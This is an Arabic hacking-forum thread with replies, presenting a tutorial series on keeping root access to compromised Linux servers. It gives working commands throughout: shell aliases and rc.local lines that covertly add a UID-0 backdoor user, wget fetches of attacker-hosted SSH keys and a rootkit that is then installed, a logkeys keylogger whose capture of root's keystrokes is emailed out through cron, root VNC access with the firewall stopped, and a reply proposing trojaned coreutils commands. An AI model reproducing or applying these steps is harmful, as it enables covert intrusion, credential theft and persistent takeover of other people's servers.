اضخم سلسله لما بعد الروت (حصري)

السلام عليكم …

كيف حالكم شباب ؟

انا كنت طارح سلسله وكنت ناوي اكمل للاختراق المتقدم ونضبط الموضوع في منتدى بوك الله يسهل عليه قديما ولكن حصلت مشاكل وانشغلنا وكمان تسكر الموقع والحمد لله لقيت موقعنا الجميل الحمايه للابد بعدها …

الفكرة الدروس هذي بنفس الحرفيه اللي كان مكتوب فيها ببوك … يعني انا كنت مخزن دروسي اشان هيك اي سؤال لا تترددو بالسؤال والنقاش حياكم الله اول ما افضى اجيبكم ,

نبدا بسم الله …

الجزء الاول … ماذا بعد الروت …

السلام عليكم ورحمة الله وبركاته …

كيف الحال شباب ؟
حبيت اضعلكم موضوع رغم انشغالي كمباركة للموقع وافتتاحه

فكرة الموضوع بسيطة جدا ومفادها اضافه يوزر روت مباشرة عن طريق alias موجود في ملف .bashrc

مبدا العمل :

لازم تعمل لنفسك alias في ملف ال .bashrc تحدد فيه شو لازم يعمل الكوماند انتربرتر لما الروت يقوم بعمل احد الاوامر يعني فكرة هذا ال alias سهلة جدا وهي انو مثلا انت بدك تعمل كالتالي :

تريد ان تسهل على نفسك لما تكتب الامر ls انو يتم تنفيذ الامر ls -la مثلا

طريقه التعديل :
لما تكون عندك صلاحيات root
افتح ملف /root/.bashrc لتقوم بالتعديل عليه عن طريق
pico /root/.bashrc
بعدين قم باضافه ال alias التالي :
#add root user
alias id=‘/usr/sbin/useradd -o -u 0 TheInjector -p mypass’

طبعا في بعض النسخ تحتاج لل alias التالي :
#add root user
alias id=‘/usr/sbin/adduser -o -u 0 TheInjector -p mypass’

اوك هيك بيكون مبروك عليك كل ما يقوم الادمن بعمل الامر id كمثال مباشرة يتم اضافه يوزر روت …
طيب بتقلي انو مرات ما ضبطت معي هذا بيكون لانه لازم تعمل uncomment للسورس الموجود في الملف >> ما بدي اتعمق بالامور

في طريقه اخرى ايضا وهي التعديل على ملف /etc/bash.bashrc وايضا ملف ~/.bash_profile
بنفس الطريقه برضو …
يعني كل الطرق تؤدي الى طولكرم eek

نسيت اقلكم في طريقه اخرى عن طريق ال skeleton تبع ال whm برضو طريقه مشابهه بشرحلكم اياها بدروس اخرى او اذا حد من التيم تبع الموقع حب يشرحها اهلا وسهلا …:slight_smile:

برضو مرات اذا كنت تستخدم الSlackware وهذا ناااااادر فهذا يجب انك تعمل ملف ال .bashrc لوحدك :slight_smile: ما علينا منو …

وبالنهايه كمرجع لكم بالامكان تشاهدو هذا الموقع
كود:
http://www.linux.org/lessons/beginner


الجزء الثاني … ماذا بعد الروت …

السلام عليكم …
كيف الحال … لقيت حالي فضيت شوي قلت بكتبلكم موضوع سريع عن ما بعد الروت كجزء تاني … هذا الموضوع بدنا فيه طرقكم ايضا يعني مش تقرا وتروح حط طريقتك :slight_smile:

الفكرة هنا اضافه يوز روت كل ما عمل الحج صاحب السيرفر ريستارت … بتقلي كيف بقلك سهله :confused:

عدل على ملف
كود:
/etc/rc.local
بالامر التالي :
كود:
pico /etc/rc.local
انا بتكلم عالاوبونتو …

اوك بعدين قم باضافه الكود التالي …

 كود:
 /usr/sbin/useradd -o -u 0 TheInjector -p mypass 

ومبروك عليك … طبعا هذه الفكرة مع الفكرة الاولى تجعلك تسيطر عالسيرفر لاطول فترة ممكنه لانه صاحب السيرفر لما يحذف الملفات بالعادة بيعمل ريستارت وبتلاقي نفسك روت مرة اخرى …
انا بعطيكم هذه الطرق السهله يوجد طرق اقوى خاصه بي واكثر تخفي ولكن نشوف نقاشكم معانا اشان الواحد يضع اكثر واكثر …


الجزء الثالث … ماذا بعد الروت …

السلام عليكم …
مرحبا مرة اخرى بالسلسه الروتيه … تثبيت نفسك بعد الروت … :rolleyes:

الجزء الاول …
كود:
http://www.p0c.cc/vb/showthread.php?t=113
الجزء الثاني …
كود:
http://www.p0c.cc/vb/showthread.php?t=167
اليوم معنا طريقه دمج بين جميع هذه الطرق التي وضعتها …
الطريقه :
كود:
pico /root/.bashrc
قم باضافه الكود التالي … الكود (1)

 كود:
 # add root by keys

alias id=‘wget http://site/authorized_keys /root/.ssh’
طبعا الطريقه اعلاه لازم تكون عارف كيف تعمل لنفسك مفاتيح للدخول بالطريقه العاديه … :cool:

المهم بعدين اذهب للملف التالي …

 كود:
 pico /etc/rc.local 

ضع فيه الاكواد التاليه : الكود (2)

 كود:
 wget http://site/authorized_keys /root/.ssh

cp /etc/ssh/sshd_config /home/site/public_html/1.txt
wget http://site/rootkit.tar ~/tmp/
tar -zxvf rootkit.tar
./install
اوك بعدين روح للملف هذا :
كود:
pico /root/.bash_profile
ضع فيه الاكوادالتاليه : الكود (3)

 كود:
 # add root by alias

alias ls=‘/usr/sbin/useradd -o -u 0 TheInjector -p mypass’
طبعا بهذه الطرق شو اللي صار :
الكود (1) === اضافه مفاتيح لدخولك للروت بمجرد انو الادمن كتب الامر id
الكود (2) ===
طلب المفاتيح …
نسخ ملف الكونفيج ل ssh اشان تشوف اذا البورت تغير للموقع اللي انت رافع عليه شل مثلا …
تثبيت روت كيت …
الكود (3) === كل ما يتم عمل ريستارت كما في الكود (1) او كتابه الامر ls راح يتم اضافه يوزر للروت …

اعتقد سابرمج لكم سكربت لما افضا اوتوماتيك كل شئ … :wink:

هيك بهذه الطرق الثلاثه اعتقد اقوى تثبيت سيكون لك على السيرفر بشكل كبير جدا ان شاء الله :cool:

هيك بنكون انتهينا من سلسله التثبيت ما بعد الروت … ان شاء الله قريبا بننتقل الى سلسله ماذا افعل بعد الروت لاستغلال السيرفر لمصالحي الشخصيه … موفقين ولا تنسونا من صالح الدعاء …


حصري جدا ولاول مرة … كيلوجر للروت والباس الخاص بيه عالايميل …

السلام عليكم ورحمة الله وبركاته

حصري جدا وبرايفت لم تنزل على اي من الساحة العربيه او الاجنبيه :cool:

طريقه تثبيت الكيلوجر على اللنكس والحصول على باس الروت بشكل دوري ودائم على ايميلك الخاص [eek

طلعت من الخاص فارجو ان ارى ردودا طيبه اشان الواحد يستمر :cool:

الطريقه كالتالي تابع معي :

اولا : طبق الاوامر التاليه

 كود:

wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz
tar xvzf logkeys-0.1.1a.tar.gz
cd logkeys-0.1.1a/
./configure
make
make install
هيك بتكون ثبتت الكيلوجر على السيرفر وانتهيت من جزء كبير من الشغل ddd

الان بدك تعمل انشاء لملف اللوج اللي راح يتم وضع كل ما يكتبه الروت فيه كالتالي :

 كود:
 touch /home/the user that u have a cpanel on it/public_html/root.log

cd /home/the user that u have a cpanel on it/public_html/
chmod 777 root.log
خطوة تغيير التصاريح من اهم الخطوات في هذه المرحلة
تمام الان احنا بدنا الروت كيت يشتغل في كل مرة يصير ريستارت للسيرفر وما يوقف اشان هيك لازم نعدل على الملف rc.local

 كود:
 pico /etc/rc.local 

بعدين قم باضافه الكود التالي

 كود:
 logkeys --start ---us-keymap --output=/home/the user that u have a cpanel on it/public_html/root.log --device=event4 

طبعا ضع هذا الكود قبل نهايه الملف اي قبل :

 كود:
 exit0 

الان طبق الامر التالي …

 كود:
 logkeys --start --output /home/the user that u have a cpanel on it/public_html/root.log 

الان كل شئ تم … صار الكيلوجر شغال وكمان كل ما يعمل ريستارت الكيلوجر بيشتغل ddd

هلا بدنا نروح للمرحلة الاخيرة وهي عمليه انو يوصلك الباس للايميل وهذي سهله جدا فقط تروح للموقع اللي الك عليه سي بنل بعدين
cron job تدخل على
بعدين تضع الميل تبعك وتكتب الامر التالي

 كود:
 cat /home/the user that u have a cpanel on it/public_html/root.log 

ومبروك عليك كل ما يكتبه الروت والهكر الموجود على السيرفر بتسحب ثغرات وايضا بتسحب ايميلات وكل شئ

– تنويه الحقوق محفوظة لي ولا اسامح احد بالنقل والنسبه لنفسه والله شهيد –

هذا الموضوع اهداء الى كل من :

T-T34M — Sa^Dev!l — Xss_Man — Sarbot — sec4ever
Mr.Safa7 == حبيب الشعب

ادعولنا بالتوفيق والنجاح وموفقين ان شاء الله


حصري ولاول مرة … استغلال الروت لاقصى درجة من خلال الريموت ديسكتوب

السلام عليكم ورحمة الله وبركاته …
كيف الحال شباب … نظرا لنوم المنتدى بسابع نومة :confused: ولاني حوقف نت خلال الاسبوع القادم اشان الامتحانات يا ريت تدعولي امانه ترا :slight_smile:

اليوم حابب اجيبها من الاخر :cool: == يعني خلاص تقول للروت اعطيني جهازك ورح روح من هون … طبعا شرحي اليوم على بكج ثانيه للنكس RED HAT بالعادة بشرح على اوبنتو لكن معظم السيرفرات هالايام ريد هات [:mad:<<< احلى توزيعة على فكرة …

المهم نبدا /
عنوان الدرس : استغلال الروت من خلال الاتصال RDP عن طريق ال VNC واغلاق الفايرول والتحكم الكامل بالجهاز … كنت حشرح تخطي ال mmap لكن في بعض الاشخاص رايتهم واضعين انهم يريدون شرحها فانا ححتفظ بيها واخليهم هما يشرحوها وموفقين بذلك … يعني قولولهم يشرحولكم اياها وعسا الله يوفقكم …

الطريقه : نفذ معي الخطوات وافهمها مضبوط لاني خايف تضيع بالنص :confused:

اولا : windows side

  1. حمل برنامج tight vnc او برنامج vnc viewer لكن انا بفضل الاول … الروابط :
    كود:
    http://www.tightvnc.com/
    http://www.realvnc.com/products/free/4.1/winvncviewer.html
  2. اعمل تثبيت للبرنامج عادي جدا كاي برنامج وندوز وشغله …

ثانيا : linux REDHAT side

  1. شغل ال ssh وادخل بالروت وبعديها نزل البكج بالامر التالي :
    كود:
    yum install vnc-server
  2. بعد ما يتم تنزيل البكج قم بكتابه الامر التالي :
    كود:
    vncpasswd
    — طبعا عدل عالباس براحتك …
  3. قم بكتابه الامر التالي :
    كود:
    su root
  4. قم بالتعديل على هذا الملف سواء ب pico او ب vi :
    كود:
    pico /etc/sysconfig/vncservers
    ابحث عن السطر التالي …
    كود:
    VNCSERVERS = “”
    قم بالتعديل عليه بانك تشيل الكومنت # من قبله وبعدين تشيله وتكتب هذا الكود بدلا منه :
    كود:
    VNCSERVERS = “1:root”
    يعني مجرد تغير الرقم واسم اليوزر ليوزر الروت
    5)خزن الملف وبعدين اكتب الامرين التاليين بشكل متتالي :
    كود:
    chkconfig vncserver on
    service vncserver start
  5. يا سلام عليك قربنا نخلص الان ما عليك الا انك تطفي الفايروول …
    كود:
    /etc/init.d/iptables stop
    طبعا في طريقه انك تضيف رولز للبورت بس بلاها هيك اريحلك …
    الان مرة تانيه بس اكتب الامر هذا :
    كود:
    service vncserver start
    تمام عليك وهيك بنكون خلصنا هذا ال side

ثالثا :
روح للويندوز اكتب التالي في برنامج ال vnc viewer
كود:
serverip:1
اكبس على connect … بعديها سلامة تسلمك اكتب الباس اللي وضعته في اول الدرس … ومبروك عليك جهاز ثاني تحضر عليه افلامك … تنزل برامجك … تفتح مواقعك ( بروكسي ) … تنزل تورنت …
يعني عيش حياتك مع النت في السيرفرات …

طبعا هذه الطريقه الحمد لله كانت اجتهاد شخصي ايام ما اكتشفتها … لا اعلم اذا حد بيعرفها لكن ما قد شفت عربي شرحها !!!

بالنسبه للموقع – اوجه طلب للقائمين عليه بان يعطوه وقت اكثر لانه يستحق نظرا للاعضاء الموجودين فيه ويحاولو يبذلو قصارى جهدهم في افادة الغير …

انا عودتكم وما زلت على الحصريات وسابقى ان شاء الله ddd=== الموضوع اهداء لكل مسلم …
الان موفقين … مش حقدر اجاوب عالاستفسارات الا اذا كنت اليوم موجود وشفتها … ادعولي لا تنسو !!!


هذه السلسله ان شاء الله تفيدكم في حياتكم (الهكريه) واي اضافات تعديل يا ريت تخبروني موفقين شباب واكيد انا عندي اقوى من هيك بطرحه في موقعنا الجميل هنا … سلاموز واكيد اخونا فراس معجب بالدورة وحيحرق دروسي مع الاخوان sec4ever و foxhacker

يلا ادعولنا سلاااااااااااممممم ,

شكراااا لك يا حج علي الموسوعة الجميلة

لاكن الأجمل في تغيير التصاريح النضام بيسهل عليك حتي لو طردت من السيرفر

شل علي السيرفر يترجع :slight_smile:

ربي يوفقك

يابن الايه يا لذينه
تمام والله يا علاء
بالذات اخر طريقه اللى هى الاستغلال زى الريموت ديسك توب
وبعدين تعالى هنا
انت كمان هتقولى فراس :))
فارس وربنا يعم
فاااااااااااااااااارس
ههههههههههههه
ربنا يعينك على الدراسه بشكل عام وعلى الفسيولوجى بشكل خاص
نشوفك على الميل يا برنس

هلا والله …
حياك يا برنس التصاريح صحيح جميله وقويه وهذه طرق اضافيه كمان اشان الزيادة …

بالنسبه لفراس ههههه فارس هههه
هلا والله يا حج … والله مفكرك شايفهم قبل هيك طلعت مش بتدخل بوك … بس يلا الحمد لله عجبوك ههه == عفكرة بس حوريك شغلات ابقا بس اصبر علي حتحرق النت العربي حرق ههه
يلا شدو حيلكم واكيد حشوفك عالميل بس ما شاء الله ما بدخل الا بلاقيك طالع وهلا مش بقدر ادخل اشان بدي اروح ههه

يلا سي يو شباب

ههههههههههههههههه
شوفتهم فى بوك
بس بجاملك بقى
يعنى عشان شكلك ميبقاش وحش قدام الاعضاء بس :))
حبيبى يابو علاء والله

راائع جدا … تصدق لو تفتح كتااب

راح تبدع

تجميعه جميله جدا تسلم ايدك

هههه … طيب يا فارس ههه يلا شدلنا حيلك انت بالدورة :slight_smile:

تمام يا حج اورنج ان شاء الله حنضبط الامور

هلا مستر خراب حياك …

موفقين شباب

زي الفل يا علاء
فلة … شمعة … منورة وتستحق هذا أكيد
نستنى جديدك
ولو حصلنا حصريات أكيد رح نزلها ونبخل ع الشباب الفل بالمنتدى
ان شاء الله قريباً
بس فحوصاتي أقوى من فحوصاتك خخخخ
بدي أربع أشهر أنا …
سلامز يا علاء يا فل

المفروض تشكر وﻻ تنتقد

وهو نزل الي عنده عندك شي نزله وورنا

مشكورين شباب عالردود …
بالنسبه لمكاوي اسمع ياض … بقلك ببساطه بقص ايدي اذا انت كنت تشم ريحة هاي الدروس او تعرف عنها قبل بوك اللي اكبر منك ما قالو شئ واستفادو منها لذلك شوف لا تتفلسف علي بعرف الهاكنج قبل لا تنولد يمكن …

اسمحلي , مثل ما بتقول , هاي وجهة نظري صدق ما وجدت لك شئ مفيد كله بس مسروق منك بالنت ما قد شفت شرح الا وقلتنلنا سرقناه منك …

اشان هيك بقلك فك عني لاني ببساطه مش صاحيلك …


اعتذر شباب بس هيك ناس بدها هيك جواب :slight_smile:

[b]الان على حد علمي ان فيه طرق للبقاء روت او للرجوع للروت صح ولالا !!؟

والطرق اللي تحضرني حاليا <<<<اللي مشهورة عند الغالبية 98% هي التالي :

1- تركيب key l0g3r

2-روت كيت

3-انشاء يوزر

4- فك باسورد الشادو وعدم تغيره <<< على شان ما يشك الروت الاساسي !

هذا اللي عرفناه او اللي منتشر عند العامه كلهم !

المهم ,

الان انا جلست افكر في طريقة بسيطه وقوية ان شاء الله

الروت ما راح يعرف وش القصة وراح ترجع مهما كان وغصب عنه
[COLOR=Purple]
الفكرة مستوحاه من فلم كرتون <<<[ الرجال اللي يبي يطفي الشمعه ولا طفاها الا يوم طلعت الشمس]

هههههههههه متابع الاخ سبيس تون

المهم المهم ,

المتطلبات :

1- خبرة في لغة C

2- حمل الملف هذا

http://ftp.gnu.org/gnu/coreutils/coreutils-8.9.tar.gz

شرح الفكرة المختصر COLOR=Magenta :[/COLOR]

بعد تحميل الرابط (عبارة عن اوامر لينوكس غير مترجمه )
1- نقوم بتلغيم الاوامر التي لايستغني عنها اي مدير سيرفرات وهي التالي :

ls

cat

pwd

dir

pwd

واوامر كثير لكن هذي الغالب والله العالم

طبعا التلغيم يكوون باضافة يوزر بعد فترة محدده او فوريا !

2- بعد تلغيم الامر

3- حذف الامر الاصلي من السيرفر الهدف.

4-رفع الامر الخاص بنا على السيرفر الهدف (وضعه في جميع المسارات الاصليه)

5-التأكد من عمل المصيبة اللي رفعناها

[/COLOR][/b]


[b][b]#include<stdio.h>
#include<stdlib.h>
main()
{
system("uname -a");

}
[/b][/b]



[b]
اممممممممممممممممممم

ان شاء الله ما اكون نسيت شئ

اي ملاحظات ولا اخطاء ياشباب نتمنى تصحيحها

========================

[/b]يعني الان انت اضفت يوزر بالطريقة التقليدية وكشفك الروت

بعد ما يحذف اليوزر تبعك وانت لغمت الامر pwd

في حال تنفيذ الروت لهذا الامر يرجع يضيفك روت اتوماتيكيا !

ان شاء الله انها وصلت لكم

نحتاج بس واحد ضليع في لغة الC حتى نتناقش في اكثر من موضوع ان شاء الله
[b]

[/b]

تمام يعم البرينس

الطرق كثيرة و الهدف وحد

شكرا يمان

شكرا لأنجكتر على الموضوع

-------------- الادارة -----------------------
موفق في حياتك …

يالله انا ابي اطلع ولا عاد ابي ادخل ذا المنتدى
سلام

اهلا حج علاء شروحات ولا اروع ماشااء الله تبارك الله … كنت افكر اعمل لها سكربت بايثون يختصر عليك بنفس الطرق تبعك لأن الى حد الان ما شفت اقوى منها … ماشاء الله تبارك الله

موفق بالدراسه شد حيلك يا اسد …

ولا يهمونك العذال : مع اني لوهله حسيت ان مكاوي Tavis Ormandy !

سلامة تسلمك … وانت حر تدخل المنتدى او تخرج :slight_smile:

هههههههههههه … هلا ديفيل والله يا برنس الواحد بيجي يدخل شوي عالنت هيك عالسريع ويحطلو درس يندم والله :slight_smile:

الا مشكور عالرد وان شاء الله ننتظر سكربتك وعفكرة انت وعبدالله انا متابعكم في حرس شدو حيلكم موفقين

الله يخليك حبيبي علاء ان شااء الله ننزل كم موضوع تنال اعجابك واعجاب الشباب …

يعطيكـ العـافية حج انجكتور …!
دروس رائعة فعلا وتستحق التثبيت :slight_smile:

بالمناسبة لهاد مش عارف شو اسمه… ااه الطبل مكاوي :smiley:
انا قلتله اكتر من مرة انه بنفعش الا لحفة وحدة :stuck_out_tongue: معلش خلص الشحن xD

وبعدين ما حد عزمك ولا طلب منك تدخل وليش محملي حالك جميلة العضوية مهو اسمع هيك الدنيا يوم في ايدك ويوم في … !
والاحلى من هيك كل شوي الناس بتتقبل : نعم , مشكور , بطل … ما أعتقدش دول ناس بيحبوك
على اية حال … انا كان عندي شيء هيعجزك !!! لذلك متم*** تبقى معانا للنهاية وتشوف مسلسلي اللي هون احلا من تبع امان :wink: + بعيدا عن العنصرية xD

وان شاء الله كل مكان تطلع منه رح تلاقي هالشعار الحلو :smiley:

10% … 20% … 30% … 40% … 50% … 60% … 70% … 80% … 90% … Insect Removed Sucessfuly !

و الاخ Xss-Man يعطيكـ العـافية ياحج الله يوفقكـ

وزي ما قال الاخ علاء في ردود بتضطر تحطها غصب عنك :smiley:
أعذرونوا يا ادارة :blush:

عسل يا اخواتي ddd

[b]رد تمام يابو زيد

  • تسلم [COLOR=Red]The Injector ع الموضوع :slight_smile: [/b][/COLOR]